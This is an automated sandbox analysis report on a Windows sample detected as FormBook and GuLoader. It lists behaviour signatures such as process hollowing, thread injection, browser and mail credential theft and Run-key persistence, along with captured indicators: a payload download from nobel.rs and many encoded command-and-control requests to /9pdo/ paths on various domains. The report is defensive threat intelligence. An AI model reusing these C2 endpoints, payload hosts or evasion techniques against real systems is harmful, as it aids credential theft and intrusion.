Windows Analysis Report
2024_04_005.exe

Overview

General Information

Sample name:	2024_04_005.exe
Analysis ID:	1436120
MD5:	26b36913a11d0056c0029d7cccc75460
SHA1:	80457e93a07706c318f4a3b8c55591d452694e29
SHA256:	b36c6a2443a47596fcd36f807f7376dc3c3bc869dd3b5d46495fd097b8494ee6
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Obfuscated command line found

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.klingerlumberltd.com/9pdo/	Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.png	Avira URL Cloud: Label: malware
Source: http://www.roundhaygardenscene.com/9pdo/	Avira URL Cloud: Label: malware
Source: http://www.roundhaygardenscene.com/9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH	Avira URL Cloud: Label: malware
Source: http://www.klingerlumberltd.com/9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I=	Avira URL Cloud: Label: malware
Source: http://www.stevethatcher.com/9pdo/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: 2024_04_005.exe

ReversingLabs: Detection: 44%

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.90700846265.0000000021170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.95003284580.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.95002883111.0000000001370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.95003804450.0000000003A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.95003597330.0000000006160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.94999869480.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Uses 32bit PE files

Source: 2024_04_005.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 37.48.104.133:443 -> 192.168.11.20:52334 version: TLS 1.2

Source: 2024_04_005.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Configuration.Install.pdb source: powershell.exe, 00000005.00000002.90710866514.00000000691B5000.00000020.00000001.01000000.00000013.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000005.00000002.90719405059.00000000694DD000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: System.Data.pdb source: powershell.exe, 00000005.00000002.90724583852.0000000069982000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: System.DirectoryServices.pdb source: powershell.exe, 00000005.00000002.90746340480.000000006A1A2000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Management.Automation.ni.pdbRSDS/9 source: powershell.exe, 00000005.00000002.90776401624.000000006BC2E000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Management.ni.pdbRSDS source: powershell.exe, 00000005.00000002.90712654398.000000006936F000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000005.00000002.90593627312.0000000006E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Foremasthand.exe
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.90585610971.000000000080C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000002.90688224300.00000000690CF000.00000020.00000001.01000000.00000014.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 00000005.00000002.90712654398.000000006936F000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG source: powershell.exe, 00000005.00000002.90596843996.00000000083D9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 00000005.00000002.90746340480.000000006A1A2000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Data.ni.pdb source: powershell.exe, 00000005.00000002.90724583852.0000000069982000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbQ00 source: powershell.exe, 00000005.00000002.90585610971.000000000080C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 00000005.00000002.90710866514.00000000691B5000.00000020.00000001.01000000.00000013.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: powershell.exe, 00000005.00000002.90838731563.000000006BFD2000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: powershell.exe, 00000005.00000002.90776401624.000000006BC2E000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000005.00000002.90744950544.000000006A0B7000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000005.00000002.90744950544.000000006A0B7000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.90776401624.000000006BC2E000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Management.ni.pdb source: powershell.exe, 00000005.00000002.90712654398.000000006936F000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000005.00000002.90716922778.0000000069426000.00000020.00000001.01000000.00000011.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 00000005.00000002.90746340480.000000006A1A2000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000005.00000002.90750513671.000000006A2D0000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000005.00000002.90688224300.00000000690CF000.00000020.00000001.01000000.00000014.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.90596401766.000000000837B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: powershell.exe, 00000005.00000002.90838731563.000000006BFD2000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: System.Management.Automation.pdb-3778222414-1001_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32l! source: powershell.exe, 00000005.00000002.90593627312.0000000006E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.pdb source: powershell.exe, 00000005.00000002.90750513671.000000006A2D0000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Management.ni.pdb source: powershell.exe, 00000005.00000002.90750513671.000000006A2D0000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000005.00000002.90724583852.0000000069982000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.90594014542.0000000006EFD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.pdb source: powershell.exe, 00000005.00000002.90716922778.0000000069426000.00000020.00000001.01000000.00000011.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 00000005.00000002.90710866514.00000000691B5000.00000020.00000001.01000000.00000013.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb/ source: powershell.exe, 00000005.00000002.90596401766.0000000008314000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: powershell.exe, 00000005.00000002.90838731563.000000006BFD2000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000005.00000002.90716922778.0000000069426000.00000020.00000001.01000000.00000011.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000005.00000002.90688224300.00000000690CF000.00000020.00000001.01000000.00000014.sdmp
Source:	Binary string: System.Numerics.pdb source: powershell.exe, 00000005.00000002.90744950544.000000006A0B7000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.90594014542.0000000006EFD000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_00402B75 FindFirstFileW,	3_2_00402B75
Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_00406726 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00406726
Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_004065DC FindFirstFileW,FindClose,	3_2_004065DC

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\vinduers\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\vinduers\languages\Odometer\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\vinduers\languages\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.eternalsunrise.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 219.94.128.41 219.94.128.41
Source: Joe Sandbox View	IP Address: 66.29.135.159 66.29.135.159

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /FaZfCetBYix205.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: nobel.rsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=DnYaRovP48GzkkJrYMb+2fT4Pkhg/GvwuVP/6iFiedv+ORSC+0oTk/Gl1D7Kx2hOtjeczUyzMCTs4BuiBiMVlNIM74EOcC0w4I/7Krg2VTUnK1jygYdG7TE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=9/X38tn9qLO2xSF02XBR/rEx8jnqUAkCRmtcXfkuabXCkgKRDBhcw5/s5NSemU/1fww/nV1egvBpaCqwFnie4syGBvlnyI6Zu2K3XALMlG8T/sDwKknxjFA=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M+TEq7R0RTFMUOKmG2dqiBXhD8cCdAclTZkEAO29Celit1EFdRt8L6G9Xd5xqtutsMklg2OrtOvYk99njtWVeRq/fD9R4HBgWh9ZRW3T/b1Zn0KY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.n-benriya002.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=exLCvVI2E5RJM8xtzs0Xap+s8OiVQ9Xf+6d2cWgRCMmdoFVcUWazUq00e3zK6s54E+NAVH76kqhd1uh4f2sE6XSWR+uNBmxDzZmQYEOmQjbtsHV8VYB5rTQ=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.scwspark.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=/vSyP1yVbm8RGq0e2H3CzkNsaOHJl/3MYALL4DCZeeN+d5B22Kt3zVmvOtiuNe7fMoA4lcLFRPd10Vr4k50RXoBd/BdrO+PNRq+sm2OxhUPGBDukAmwFGJM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.eternalsunrise.xyzUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.roundhaygardenscene.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.klingerlumberltd.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=VHiI6b/PPIA+OuARKaswq4b959D7SkxlZx7zpnglo7qdO2KXbQcQ9KuRFrEQ+F9C9sgTMWbLOSxIFzstzFciu1MPjvyftGkFxn6hWuyxlTlwRkGEMIrwXeI=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.fraternize.orgUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=3VEjKqPjJRFd1LEr7ftl6AeEjohVN1gCDcT03q/HcmbmUvzHTf5Gj5hvcK/QqTejry7alcBNCY2t4H+vJZJIHp8tocbCa9LgYeFrT1dxHygs+eIMLFxUj+8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.electra-airways.infoUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=z4EbQ/0+Z2zPU4/RVXslSAEzGqGuOzSPEXVlRRq2m+qj0dJnOgaQ/GbsoFonwncJq2LQE08kULao6+1QBSZUGJAxywljr6IstyX2fx3+/D27y0FPpkXVVLM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.avolci.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.huatihui2.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=5K5/VA3FvgXP3sOI5TVHRr0123GQWKm5D55sHH5mchSplaEvvZgII2ySuagHs1MCJ8n0jDb1wSt+mpytAheJKVJbfKiFVgGyXzn0CLSM59yBd0XUUlo5tgQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.stevethatcher.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=0DGTuA6y7M/wLSr0kneg8YEAwW66+S1tR7phNjB1U9UE4xiz+PGigUaE1dFUhjL1hYKynwQR5zkXwRTBrBJI0vMFkq8Tbe7pIeNuz9jCCKB2fjNWkoH785s=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.aneiina.topUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=DnYaRovP48GzkkJrYMb+2fT4Pkhg/GvwuVP/6iFiedv+ORSC+0oTk/Gl1D7Kx2hOtjeczUyzMCTs4BuiBiMVlNIM74EOcC0w4I/7Krg2VTUnK1jygYdG7TE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=9/X38tn9qLO2xSF02XBR/rEx8jnqUAkCRmtcXfkuabXCkgKRDBhcw5/s5NSemU/1fww/nV1egvBpaCqwFnie4syGBvlnyI6Zu2K3XALMlG8T/sDwKknxjFA=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M+TEq7R0RTFMUOKmG2dqiBXhD8cCdAclTZkEAO29Celit1EFdRt8L6G9Xd5xqtutsMklg2OrtOvYk99njtWVeRq/fD9R4HBgWh9ZRW3T/b1Zn0KY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.n-benriya002.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=exLCvVI2E5RJM8xtzs0Xap+s8OiVQ9Xf+6d2cWgRCMmdoFVcUWazUq00e3zK6s54E+NAVH76kqhd1uh4f2sE6XSWR+uNBmxDzZmQYEOmQjbtsHV8VYB5rTQ=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.scwspark.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=/vSyP1yVbm8RGq0e2H3CzkNsaOHJl/3MYALL4DCZeeN+d5B22Kt3zVmvOtiuNe7fMoA4lcLFRPd10Vr4k50RXoBd/BdrO+PNRq+sm2OxhUPGBDukAmwFGJM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.eternalsunrise.xyzUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.roundhaygardenscene.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.klingerlumberltd.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
